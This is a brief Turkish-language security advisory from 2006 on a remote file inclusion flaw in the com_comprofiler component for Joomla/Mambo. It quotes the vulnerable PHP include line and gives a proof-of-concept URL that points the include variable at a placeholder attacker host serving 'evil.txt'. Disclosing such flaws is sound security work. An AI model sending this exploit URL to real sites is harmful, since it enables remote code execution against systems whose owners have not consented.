Risk : Yüksek | Kritik
Etki : Uzaktan Kod Çalıştırma
Etkilenenler : joomla | mambo RC 2 v1.0
Yer/Kapsam : Remote
Zaman/Time : 25 Ağustos 2006
Etkilenen ve Güvenlik Açığının Bulunduğu Yazılım; com_comprofiler Components
Application : com_comprofiler
version : 1.0 RC 2
Güvenlik Açığının Meydana Geldiği Parametre; com_comprofiler klasörünün içindeki script plugin.class.php parametresi güvenlik açığının oluşmasına neden olmaktadır.
PHP;
<?php
/**
* Plugin handler
* @package Joomla
* @author various, JoomlaJoe and Beat
*/
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );
----------------------------------------------------------
Variables $mosConfig_absolute_path are not properly sanitized.
Proof Of Concept:
Exploit ( örnek kod saldırısı ) :
http://[hedefsite]/[path]/administrator/components/com_comprofiler/plugin.c
lass.php?mosConfig_absolute_path= http://atakyapılacaksite.com/evil.txt?
Advisory : #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net
Security Adivosry by Onur OKTAY